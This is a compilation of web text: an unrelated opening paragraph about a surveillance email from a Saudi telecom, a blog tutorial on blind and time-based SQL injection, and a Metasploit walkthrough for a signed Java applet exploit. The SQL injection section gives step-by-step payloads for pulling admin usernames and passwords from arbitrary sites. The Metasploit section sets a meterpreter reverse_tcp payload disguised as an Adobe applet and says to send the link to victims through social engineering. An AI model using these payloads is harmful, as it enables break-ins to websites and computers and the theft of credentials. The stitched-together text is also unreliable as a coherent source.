Last week I was contacted by an agent of Mobily, one of two telecoms operating in Saudi Arabia, about a surveillance project that they’re working on in that country. Having published two reasonably popular MITM tools, it’s not uncommon for me to get emails requesting that I help people with their interception projects. I typically don’t respond, but this one (an email titled “Solution for monitoring encrypted data on telecom”) caught my eye.

BLIND and TIME-BASED SQL INJECTIONS

In today’s tutorial I will be doing my best to show you some examples of how to perform BLIND SQL Injections to extract information from a vulnerable backend database. This method is a little harder than the UNION method but is still very viable in the wild, if you are patient enough to stick with it to the end. I will follow similar form as previous tutorials and run through an example from start to finish with some helpful tips and additional examples at the end as well as a mini-tutorial on TIME-BASED Injections. I hope you find it informative and helpful, here goes…


I will begin as previously instructed using the UNION method to show that this method doesn’t always work (despite being the easiest). This will keep you from wasting your time as this is not the method to be starting with, due to time involved. OK so we test our site link to see if the page is vulnerable by adding the single quote to the end of our page link, and check the response for errors.

SAMPLE IMAGE - BEFORE ‘:


SAMPLE IMAGE - AFTER ‘:


We can see the page appears to be vulnerable. Let's check the column count as well as the vulnerable column(s). We use ORDER BY as normal, but it doesn't seem to have any effect no matter how high I go (1-1500 = no change)... but wait, I remember a note from the previous tutorial about STRING-based injections, let's try that:

SAMPLE IMAGE - INTEGER APPROACH WITH NO LUCK:

SAMPLE IMAGE - STRING WITH DIFFERENT RESULTS:

What do you know…it worked! OK so we were able to find out that there are only 2 columns in our example site. Let’s now see if we can find out which one is vulnerable trying to use UNION SELECT. Hmm we seem to be getting an error...
Let’s try UNION ALL SELECT to see if this helps resolve the differences between column value types…

Still no luck... giving up? NO WAY. Now let's see if we can use some BLIND injection techniques to get results. We will begin with AND/OR statements to confirm the site is vulnerable, then work on extracting information and finally database contents. We confirm the vulnerability of a page link much as we used the single quotation mark in previous examples, only for BLIND injections we use TRUE/FALSE statements and read the result from the server's response. The basic check works like this:
                http://www.site.com/index.php?id=725 AND 1=1                           (No Errors)
                http://www.site.com/index.php?id=725 AND 1=2                           (Errors on Page)
We are hoping to find a difference in how the two pages are displayed as a result of our trailing statement, just like we did with the single quotes in the original tutorial. Looking at them quickly, 1 is always equal to 1, so that must be TRUE, whereas 1 does not equal 2 and thus should return FALSE. The difference when the page refreshes may be highlighted by errors as in previous examples, or it may be more subtle: pictures failing to display, or pieces of the page missing text. The key is simply to look for differences, as they indicate we may have found a vulnerability. OK, moving forward...

We now have the column count, but we will need to check the version real quick to make sure we use the proper methods to extract information (remember the differences I highlighted in the original SQLi tutorial). We can check the version by running two request statements and comparing the results, whichever requests returns TRUE lets us know the version number. The two requests looks like this:
                http://www.site.com/index.php?id=725'  and substring(@@version,1,1)=4--+-
                http://www.site.com/index.php?id=725'  and substring(@@version,1,1)=5--+-

SAMPLE IMAGE - v4 Check:

SAMPLE IMAGE - V5 Check:

Alright, in this example we can see it is v5. Now that we have the basics out of the way, it is time to start enumerating some table names from the current database. We will use TRUE/FALSE request statements and then analyze the errors or responses generated to determine if we are on the right track, as we will have to start by guessing the table names. This takes some guessing and some time, which is why most people don't like this method, but it can pay off when nothing else works, so have some patience. It works like this:

http://www.site.com/index.php?id=725'  and (SELECT 1 from passwords limit 0,1)=1--+-          (Errors)
http://www.site.com/index.php?id=725'  and (SELECT 1 from users limit 0,1)=1--+-              (Errors)
http://www.site.com/index.php?id=725'  and (SELECT 1 from members limit 0,1)=1--+-            (Errors)
http://www.site.com/index.php?id=725'  and (SELECT 1 from admin limit 0,1)=1--+-              (No Errors!)

If we get the page to refresh without any errors it is an indication that the table actually exists, whereas if the table does not exist the server will generate an error of some kind. We will use this info to map things out and simply keep replacing the table referenced after the FROM part of the statement until you are satisfied you have found all of the ones you’re interested in. In our example above we have found the table “admin” as the page refreshed 100% indicating the table name is present whereas errors were received on all of the others.

NOTE: In the errors sometimes it will say “Table 'X.<guessed-table-name>' doesn't exist”. This error indicates the current database name where “X” is (in case you couldn’t find it elsewhere).

TIP: When guessing table names, start with the obvious ones and then work towards more general ones. Also, if you know you only care about specific ones then only work on those (admin, users, members, admincp, etc). Be aware that not all admins are 100% dummies, so they may have done something super tricky like renaming them. I find a lot like to use the site name as a prefix, or site-prefix-db, and then the table or database names (e.g. Microsoft.com might use a naming convention like m_admin, m_users, m_members, or maybe mdb_admin, mdb_users, etc). If you have time make sure you try all options, as once you find one the rest typically follow the same naming convention.

SAMPLE IMAGE – ERROR:

SAMPLE IMAGE – TABLE PRESENT. NO ERROR:


We now have a valid table name, so it is time to change our syntax slightly so we can try to guess column names from the table that we already know is there. Again, we will be using the TRUE/FALSE results to determine what columns are present in the table. It will work like this:

http://www.site.com/index.php?id=725' and (SELECT substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1--+-

We are now using SUBSTRING to run a query within the query and check for columns FROM our found table (admin). Again, we will be guessing for the most part, but you can typically go for the main columns depending on what you are after (e.g. id, userid, adminid, login, pass, password, email, access_level, etc). The process works the same as for tables and you simply repeat until you think you have got them all, or at least the ones you need. To continue our example:

http://www.site.com/index.php?id=725' and (SELECT substring(concat(1,userid),1,1) from admin limit 0,1)=1--+-     (No Errors!!)
http://www.site.com/index.php?id=725' and (SELECT substring(concat(1,login),1,1) from admin limit 0,1)=1--+-      (Errors)
http://www.site.com/index.php?id=725' and (SELECT substring(concat(1,username),1,1) from admin limit 0,1)=1--+-   (No Errors!!)
http://www.site.com/index.php?id=725' and (SELECT substring(concat(1,password),1,1) from admin limit 0,1)=1--+-   (No Errors!!)

It looks like we have found the columns “userid”, “username” and “password” from our “admin” table.

SAMPLE IMAGE – Errors:


SAMPLE IMAGE – No Errors as Column is Present in Table:


Now that we have found the table name and associated column names we can actually extract some data. In order to extract we will change our syntax slightly so that it takes advantage of the ASCII/CHAR conversion. We will again analyze the results based on TRUE/FALSE responses. This part is very time consuming as we have to get one letter at a time (as a CHAR value) and then convert it to get the plain text that most people can identify with. The process should go something like this:

- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65
  - TRUE: the first char of the password for the admin with userid=1 is greater than 65, so we need to go higher with our next request until we hit an error
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>122
  - FALSE: error, indicating it is not a char greater than 122, which is good as that is what we would expect, so now we need to meet in the middle
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>100
  - TRUE: still need to continue moving higher
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>115
  - FALSE: getting warmer, but still need to reduce a little
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>112
  - TRUE: still need to continue moving higher
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>113
  - FALSE: indicating we have gone too far – WTF?
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>111
  - TRUE: indicating we need to move up

As you can see this can take some time. In the example above we would use some reasoning and determine that the char value is greater than 111 but less than 113. When we ran the test against 112 it returned TRUE, meaning it is greater than OR equal to 112. If we convert this we get the letter "p". OK, so we have the first letter; now let's adjust our LIMIT at the end to move on to the second character position. We will also do our best to use our brains to speed things up and guess the next logical character to follow a "p" (like maybe an "a" = 97). It now looks like this:

- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>97
  - TRUE: indicating we need to move up
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),2,1))>98
  - FALSE: indicating we have gone too far and that we were right with the guess of an "a", which is char value 97

OK, so we have now found the first two letters of the password, which are "pa". Let's keep guessing:
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>115
  - TRUE: indicating we need to move up
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),3,1))>116
  - FALSE: indicating we have gone too far and that we were right on track with the guess of an "s", which is char value 115. Wonder what's next?
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>116
  - FALSE: indicating we have gone too far and found another "s", or 115
- http://www.site.com/index.php?id=725' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),4,1))>115
  - TRUE: indicating we have found another "s"

When we put it together we have found char values of 112, 97, 115, & 115 which when converted equates to “pass”. The admin with userid=1 has a password of “pass”.  In some cases the char values may be for an MD5 hash so it might not come across until you have the entire thing. You can keep adjusting the LIMIT value until you no longer get any return values (i.e. ERRORS) indicating there are no more character positions to enumerate.

NOTE: To help speed things up we can use the start and end points of the ASCII chart, which has "A" at 65 and "z" at 122. You can then use the results to narrow down your search to the more appropriate section or letter. I tend to focus on the lower case options first (97-122) to speed things up, but the full chart can come into play in the wild. I will be working to add a page or post with a full ASCII conversion chart, but it is a pain to put it into HTML table format so it will format correctly on this blog (I already tried several times to take an easier route), so I will have this up in a few weeks' time; please check back.

This brings my tutorial on BLIND SQL Injection to an end as we have now covered things from find to extraction. I hope you have been able to follow along and find the information helpful. Please remember to check my other pages for more tutorials on other methods or tools. I have also included some extras below for additional reference. Until next time…Enjoy!

Laters – H.R.

EXTRA REFERENCE MATERIAL:
USING MID() TO CHECK VERSION:
- http://www.site.com/index.php?id=725 AND 1=1--
  - No Errors
- http://www.site.com/index.php?id=725 AND 1=2--
  - Errors!
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 1, 1)) > 51
  - TRUE: go higher
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 1, 1)) > 53
  - TRUE: go higher
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 1, 1)) > 52
  - TRUE: go higher
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 1, 1)) > 54
  - FALSE: CHAR=53
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 2, 1)) > 43
  - TRUE: does not use "+" to separate the version digits, go higher
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 2, 1)) > 45
  - TRUE: does not use "-" to separate the version digits, go higher
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 2, 1)) > 46
  - TRUE: uses "." to separate the version digits, as testing 47 next would return FALSE
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 3, 1)) > 51
  - FALSE: must be lower
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 3, 1)) > 49
  - FALSE: must be lower
- http://www.site.com/index.php?id=725 AND ORD(MID((VERSION()), 3, 1)) > 48
  - TRUE: indicating CHAR=48
- MID() can be used to extract characters from a text field

RESULTS = 53, 46, 48, which converts to "5.0". You would simply keep increasing the LIMIT to move forward through the character positions until you hit the end and error out. You usually don't have to check for the "-" or "+" signs until further into the version description (e.g. 5.0.1+log or 5.3.7-community), but I thought I would show you how to test for them in the examples.

SUPER FAST MINI-TUT ON TIME-BASED INJECTIONS:
The syntax will change, but the overall method is similar to the previous examples; however, we will be using time to determine TRUE/FALSE results (if the site is vulnerable the time delays will be noticeable before the page refreshes). You may need to adjust the time settings to fit your needs, but these will get you started.

TIME-BASED Injection - Vulnerability Testing:
- INTEGER: http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)
- STRING: http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'--+- (+10 seconds)

TIME-BASED Extraction of CURRENT DATABASE USER
Determine Length of USER:
- http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
- http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
- http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
- http://[site]/page.asp?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:10'--
- http://[site]/page.asp?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Result = 5 characters in length

Having determined the length, try to find the CHAR value one character position at a time, like this:
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>100) WAITFOR DELAY '00:00:10'--
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:10'--
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Result = the first character's CHAR value is 97, which is an "a"
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Result = the second character's CHAR value is 100, which is a "d"
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>108) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  - Result = the third character's CHAR value is 109, which is the letter "m"
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),4,1)))>104) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),4,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Result = the fourth character's CHAR value is 105, which is an "i"
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),5,1)))>109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),5,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Result = the fifth character's CHAR value is 110, which is the letter "n"

Database User = 97,100,109,105,110 = admin


TIME-BASED Extraction of CURRENT DATABASE NAME
This follows the same method as used above to grab the USER, but we change the reference to DB_NAME(). Again, we need to check the length first and then use the LIMIT to move from one character position to the next until we have captured all the values, and then convert. It looks like this:
- http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=6) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=116) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=68) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=66) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Database Name = 116,101,115,116,68,66 = testDB

TIME-BASED Extraction of 1st TABLE IN DB:
This will get the first table name of the current database.
- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=7) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Result = table name of 7 characters in length
  - Remember you can use greater-than or less-than comparisons to help narrow things down when starting from the unknown
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=77) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),6,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),7,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Table Name =77,101,109,98,101,114,115 = Members

TIME-BASED Extraction of 2nd TABLE IN DB:
- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members')=6) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),2,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),3,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),4,1)))=99) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),5,1)))=121) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'Members'),6,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Table Name = 106,117,105,99,121,49 = juicy1

NOTE: Replace the table name referenced in the first request with the last one found to get additional table names, meaning the next request would look something like this:
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'juicy1'),1,1)))=65) WAITFOR DELAY '00:00:10'--

TIME-BASED Extraction of 1st TABLE COLUMNS:
Now that you have figured out the database name and first table name, let's enumerate some columns from the table(s) we found. It will look like this for the first column of the first table:
- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Remember that, to help you out and speed things up, you can check the length before you start testing away
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Column Name = 117,115,101,114 = user

TIME-BASED Extraction of 2nd COLUMN NAME:
- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user')=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Length check
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user'),1,1)))=80) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user'),2,1)))=65) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user'),3,1)))=83) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'user'),4,1)))=83) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Column Name = 80,65,83,83 = PASS

TIME-BASED Extraction of 3rd COLUMN NAME:
- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS')=6) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Length check
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),5,1)))=73) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members' and column_name>'PASS'),6,1)))=68) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Column Name = 117,115,101,114,73,68 = userID

TIME-BASED Extraction of Data:
Now that we have the table (Members) and column names (user, PASS, & userID) from the current database (testDB), we can extract information. Unfortunately we need to extract the results one field at a time. To get the first field (user) from the Members table, starting on row 1, we would do this:

- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 user from Members)=5) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Length check
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),1,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),2,1))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),3,1))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),4,1))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 user from Members),5,1))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Results for first user entry = 97,100,109,105,110 = admin

Now to get the next column:
- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from Members)=4) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Length check
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from Members),1,1))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from Members),2,1))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from Members),3,1))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from Members),4,1))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Results = 112, 97, 115, & 115 = pass

Now to get the userID:
- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 userID from Members)=1) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Length check
- http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 userID from Members),1,1))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Results = 49 = 1

Overall Results FOR ROW 1:
- admin::pass::1

EXTRACTION OF 2nd ROW DATA:
- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 user from Members where user NOT in ('admin') order by Members desc)=2) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Length check
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 user from Members where user NOT in ('admin') order by Members desc),1,1)))=72) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 user from Members where user NOT in ('admin') order by Members desc),2,1)))=82) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Results = 72 & 82 = HR

Repeat as needed, using the same method as above for ROW 1, to get the additional columns for ROW 2. Then we increment again and use the last found results in our NOT IN list to keep things moving along. If we were to keep going it would look like this:

- http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 user from Members where user NOT in ('HR') order by Members desc)=<length-to-check>) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  - Length check
- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 user from Members where user NOT in ('HR') order by Members desc),1,1)))<insert <, > or = here><insert-char-value-here>) WAITFOR DELAY '00:00:10'-- (+10 seconds)

That concludes my coverage of TIME-BASED BLIND INJECTIONS. I can't show the photos, so hopefully it makes sense. Try adjusting the times until you find something that works. A great way to learn this is to wait until you have found a site you can get with a tool (like SQLMAP) that confirms the method used was time-based. Then you can manually test afterwards to see how things work. I really hope you appreciate this one, as it took the longest to organize and make sense of. If you have any other methods that I missed that can be easily documented, please let me know so I can update this write-up. Until next time…Enjoy!

source: http://kaoticcreations.blogspot.com

JAVA SIGNED APPLET EXPLOIT

This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "run", the applet executes with full user permissions.

Open a BackTrack terminal and type msfconsole.

Now type use exploit/multi/browser/java_signed_applet and press enter.

msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp

msf exploit(java_signed_applet) > set appletname adobe (the main applet's class name)

msf exploit(java_signed_applet) > set certcn adobe player (value for the certificate)

msf exploit(java_signed_applet) > set srvhost 192.168.1.4 (this must be an address on the local machine)

msf exploit(java_signed_applet) > set srvport 80 (the local port to listen on; default: 8080)

msf exploit(java_signed_applet) > set uripath adobevideos (the URL path to use for this exploit)

msf exploit(java_signed_applet) > set lport 443

msf exploit(java_signed_applet) > exploit

The URL you would give to the victim is http://192.168.1.4/adobevideos

Send the link of the server to the victim via chat, email or any social engineering technique.
When the victim opens that link in their browser, it immediately shows a dialog box warning that the digital signature cannot be verified, like the picture below.

You now have access to the victim's PC. Use "sessions -l" to list sessions and the session number to connect to one: type "sessions -i ID".

VIDEO TUTORIAL: http://adf.ly/OUZOp

source: http://backtrack-page.blogspot.com